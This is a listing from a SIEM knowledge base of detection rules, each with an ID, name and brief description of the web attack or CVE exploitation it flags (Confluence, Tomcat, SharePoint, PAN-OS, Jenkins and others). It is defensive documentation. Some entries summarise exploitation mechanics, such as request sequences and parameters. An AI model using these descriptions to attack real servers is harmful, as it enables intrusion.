MaxPatrol SIEM knowledge base

wallarm: PT-CR-2481: Wallarm_RCE_Attack_Detected: An attempted RCE attack was detected by Wallarm wallarm: PT-CR-2483: Wallarm_Attack_Detected: An attempted attack on a web application was detected by Wallarm wallarm: PT-CR-2478: Wallarm_SQL_Injection_Detected: An attempted SQL injection attack was detected by Wallarm wallarm: PT-CR-2482: Wallarm_XSS_Attack_Detected: An attempted cross-site scripting (XSS) attack was detected by Wallarm wallarm: PT-CR-2479: Wallarm_Path_Traversal_Detected: An attempted Path Traversal attack was detected by Wallarm unix_mitre_attck_initial_access: PT-CR-288: Unix_Suspicious_Activity_By_Web_User: Suspicious commands were executed on behalf of a web service: commands for local reconnaissance, commands related to security analysis tools, or other commands with the current working directory matching the web server directory vulnerabilities: PT-CR-2405: CVE_2024_24919_CheckPoint_Information_Disclosure: Exploitation of the CVE-2024-24919 vulnerability that allows attackers to read any files on Check Point firewall devices without authorization. The vulnerability is in Check Point software with the IPSec VPN, Remote Access VPN, and Mobile Access blades enabled. vulnerabilities: PT-CR-1994: CVE_2023_22515_Confluence: Exploitation of vulnerability CVE-2023-22515 in Confluence that allows creating administrator accounts without authentication on the server vulnerabilities: PT-CR-2455: CVE_2024_4577_PHP_CGI_RCE: Possible exploitation of vulnerability CVE-2024-4577 in PHP for Windows where PHP is used in CGI mode. The vulnerability allows an unauthorized attacker to remotely execute arbitrary code on a web server. At the time of developing this rule, the attack can be reproduced only in Windows operating systems with Chinese (both simplified and traditional) or Japanese languages installed. The vulnerability is due to incorrect handling of Unicode character 0xAD (soft hyphen) that is interpreted as a regular hyphen by the CGI engine. This allows attackers to specify additional command line arguments starting with a hyphen for PHP vulnerabilities: PT-CR-2065: CVE_2023_46604_ActiveMQ_RCE: Possible exploitation of vulnerability CVE-2023-46604 in Apache ActiveMQ for remote code execution vulnerabilities: PT-CR-2281: CVE_2024_23897_Jenkins_Arbitrary_File_Read: Exploitation of the CVE-2024-23897 vulnerability in Jenkins. An attacker can read an arbitrary file via the Jenkins command-line interface by adding the "@" character to the file path. vulnerabilities: PT-CR-3142: Uptime_Kuma_RCE_Via_Fake_Chrome: Possible exploitation of an Uptime Kuma vulnerability that allows attackers to remotely execute arbitrary code. In Uptime Kuma, you can specify a path to the Chrome or a Chromium-based browser and perform its test run. Attackers can create an executable file masquerading as a Chrome file in a whitelisted directory and run it under the server account. vulnerabilities: PT-CR-3348: CVE_2025_64459_Django_SQL_Injection: Possible attempt to exploit the CVE-2025-64459 vulnerability in Django. Incorrect dictionary processing allows attackers to inject an internal parameter ("_connector" or "_negated") into HTTP requests to manipulate database query logic. vulnerabilities: PT-CR-1917: CMS_1C_Bitrix_Race_Landing_Exploit: Possible exploitation of vulnerability of the landing module of the site content management system (CMS) 1C-Bitrix: Site Management vulnerabilities: PT-CR-2836: CVE_2024_9474_PaloAlto_Command_Injection: Exploitation of vulnerability CVE-2024-9474 that allows users authenticated in Palo Alto Networks PAN-OS to execute commands as root. The vulnerability is often exploited in conjunction with CVE-2024-0012 that allows bypassing Palo Alto Networks authentication. vulnerabilities: PT-CR-3038: CVE_2025_33073_SMB_Client_Elevation: Exploitation of the CVE-2025-33073 vulnerability in Windows NTLM authentication. This vulnerability allows an attacker to bypass existing credential reflection mitigations and remotely obtain a system token. The attacker registers a fake DNS record with a specific name pattern, makes it point to a controlled IP address, and coerces the target system to authenticate to this address. vulnerabilities: PT-CR-2943: CVE_2025_24813_Tomcat_RCE: Attempt to exploit the CVE-2025-24813 vulnerability in Apache Tomcat that allows remote arbitrary code execution. Using HTTP PUT, attackers upload a serialized session file to the server and, using a GET request with the name of this file as the value of the JSESSIONID parameter, start the process of deserialization and payload execution. vulnerabilities: PT-CR-2776: CVE_2024_49040_Exchange_Sender_Address_Spoffing: Mismatch of SMTP headers "From" and "Return-Path" in MS Exchange Server transport system events. This may indicate the exploitation of vulnerability CVE-2024-49040 (increasing user trust in a phishing message by replacing the displayed sender address with a legitimate one). vulnerabilities: PT-CR-2247: CVE_2023_27350_PaperCut_Authentication_Bypass: Suspicious process start chain for PaperCut NG/MF application. This may indicate exploitation of the CVE-2023-27350 vulnerability and malicious code execution using the built-in PaperCut NG/MF functionality: printing scripts and integration with third-party tools for authorization vulnerabilities: PT-CR-1983: Possible_CVE_2023_20198_Cisco_IOS_XE: Possible exploitation of vulnerability CVE-2023-20198 in Cisco IOS XE associated with privilege escalation by creating a new administrator account vulnerabilities: PT-CR-3157: CVE_2025_59287_WSUS_RCE: Exploitation of the RCE vulnerability CVE-2025-59287 in Windows Server Update Services (WSUS) vulnerabilities: PT-CR-2293: CVE_2024_27198_TeamCity_Authentication_Bypass: Exploitation of vulnerability CVE-2024-27198 in TeamCity. The vulnerability allows an attacker to bypass authentication to create a new TeamCity user with administrator permissions or access token for a user. This can be used to remotely execute commands. vulnerabilities: PT-CR-2091: CVE_2022_26134_Confluence_RCE: Exploitation of the CVE-2022-26134 vulnerability in Confluence. This allows attackers to inject OGNL code and then remotely execute arbitrary code without authenticating to the server. vulnerabilities: PT-CR-3066: CVE_2025_47286_iTop_RCE: Exploitation of the CVE-2025-47286 vulnerability in Combodo iTop. Incorrect processing of the $sMysqldumpCommand variable that specifies the directory where the Mysqldump executable is located allows attackers to remotely execute code (RCE) by changing the configuration parameter value to an arbitrary command. vulnerabilities: PT-CR-3078: CVE_2024_38077_RCE_RDP_Licensing_Server: Exploitation of the CVE-2024-38077 vulnerability in Windows Remote Desktop Licensing Service. This vulnerability allows attackers to remotely execute arbitrary code without authentication and gain complete control over the system. vulnerabilities: PT-CR-2431: Subrule_CVE_2024_21683_Confluence_RCE: Successful POST request to the Confluence function "Add a new language" in the "Code" macro settings section from an authenticated user. This may indicate the exploitation of vulnerability CVE-2024-21683, which allows arbitrary code to be executed on the Confluence server host. vulnerabilities: PT-CR-3022: CVE_2025_1974_Kubernetes_IngressNightmare: Attempt to exploit one of the InrgessNightmare vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, or CVE-2025-1974). These critical vulnerabilities allow the injection of arbitrary directives into the Ingress NGINX Controller configuration or arbitrary code execution in the Ingress NGINX Controller container without prior authentication. vulnerabilities: PT-CR-2873: CVE_2024_47575_FortiJump_FortiManager_RCE: An unregistered device was added to the FortiManager centralized management system. This may indicate the exploitation of the CVE-2024-47575 vulnerability, which allows remote code execution on the FortiManager server. An attacker can use crafted requests to execute unauthorized code via FGFM with system privileges. vulnerabilities: PT-CR-2942: Subrule_CVE_2025_24813_Tomcat_RCE: Exploitation of the CVE-2025-24813 vulnerability in Apache Tomcat that allows remote arbitrary code execution. Using HTTP PUT, attackers upload a serialized session file to the server and, using a GET request with the name of this file as the value of the JSESSIONID parameter, start the process of deserialization and payload execution. vulnerabilities: PT-CR-3003: CVE_2025_32433_Erlang_SSH_RCE: An Erlang server process accepted an incoming connection and created a reverse shell or accessed a sensitive file. This may indicate the exploitation of the CVE-2025-32433 vulnerability that allows arbitrary code execution with SSH daemon privileges without authentication. vulnerabilities: PT-CR-3076: CVE_2025_53770_SharePoint_Unauthenticated_RCE: Attempt to exploit or check for the CVE-2025-53770 vulnerability in SharePoint. This vulnerability allows arbitrary code execution without authentication via a payload-containing POST request to the ToolPane.aspx component with the Referer set to "/_layouts/signout.aspx". vulnerabilities: PT-CR-2064: Subrule_ActiveMQ_Connect: Connection to the Apache ActiveMQ service vulnerabilities: PT-CR-2486: Sharepoint_Remote_Code_Execution: Exploitation of vulnerability CVE-2024-38023, CVE-2024-38024, or CVE-2024-38094 in Microsoft SharePoint Server. These vulnerabilities allow an authenticated user with site owner permissions to upload a malicious file to a target SharePoint server and execute API requests that trigger deserialization of the file parameters. By doing so, an attacker can remotely execute arbitrary code. vulnerabilities: PT-CR-2433: CVE_2024_21683_Confluence_RCE: Exploitation of vulnerability CVE-2024-21683 in Confluence. The vulnerability allows an authenticated user to download and execute arbitrary malicious code through the "Add a new language" function in the "Code" macro settings section. microsoft_exchange: PT-CR-1476: Exchange_ProxyNotShell: The ProxyNotShell vulnerability from the Metasploit package was exploited mitre_attck_execution: PT-CR-649: Suspicious_Child_From_Webserver_Process: A user started a process from a parent web server process mitre_attck_execution: PT-CR-645: Recon_Via_Webserver_Process: A user started a process from a parent process web_servers_abnormal_activity: PT-CR-3156: Possible_Web_Attack: Attempt to exploit a critical vulnerability (XSS, SQL injection, file inclusion, or path traversal): a suspicious pattern was detected in an HTTP request process_chains_and_logons: PT-CR-3340: Suspicious_Node_Process_Chain: Suspicious process chain: the Node.js interpreter started the command prompt, which may indicate the exploitation of vulnerabilities in server-side JavaScript applications and frameworks, such as the CVE-2025-55182 vulnerability in React or Next.js process_chains_and_logons: PT-CR-953: Suspicious_Webserver_Process_Chain: Suspicious process start chain for web server utilities pt_application_firewall: PT-CR-1882: PTAF_XSS_Attack_Detected: PT AF detected an attempted cross-site scripting (XSS) attack pt_application_firewall: PT-CR-1896: PTAF_Path_Traversal_Detected: PT AF detected an attempted Path Traversal attack pt_application_firewall: PT-CR-1897: PTAF_LFI_Detected: PT AF detected an attempted exploitation of the LFI vulnerability (Local File Inclusion) pt_application_firewall: PT-CR-1907: PTAF_CVE_Detected: PT AF detected a vulnerability exploitation attempt pt_application_firewall: PT-CR-639: PTAF_Alert_Detected: A PT AF rule was triggered pt_application_firewall: PT-CR-1884: PTAF_SQL_Injection_Detected: PT AF detected an attempted SQL injection attack pt_application_firewall: PT-CR-637: PTAF_Reflected_File_Download_Detected: PT AF detected a reflected file download (RFD) attack network_devices_abnormal_activity: PT-CR-475: Smart_Install_Usage: Possible vulnerability exploitation in Cisco Smart Install postfix: PT-CR-2715: Postfix_Shellshock_On_Patched_Version: Possible exploitation of the CVE-2014-6271 (Shellshock) vulnerability in Postfix versions where this vulnerability is fixed pt_nad: PT-CR-730: NAD_CVE_On_Vulnerable_Host: PT NAD detected an attempt to exploit a vulnerability bitbucket: PT-CR-2541: Bitbucket_Possible_RCE_via_API: A request was sent to a Bitbucket host. The "exec=" pattern in a request parameter indicates possible exploitation of the CVE-2022-36804 vulnerability in Bitbucket Server that allows attackers to execute arbitrary code on the server. network_devices_compromise: PT-CR-571: Cisco_IOS_Change_Config_By_SNMP: A configuration file was modified from an untrusted host on a device network_devices_compromise: PT-CR-576: CheckPoint_SmartConsole_Connection: A connection with the CheckPoint SmartConsole utility from an untrusted host is detected network_devices_compromise: PT-CR-575: Smart_Install_Exploitation_Tool_Usage: Use of Smart Install Exploitation Tool is detected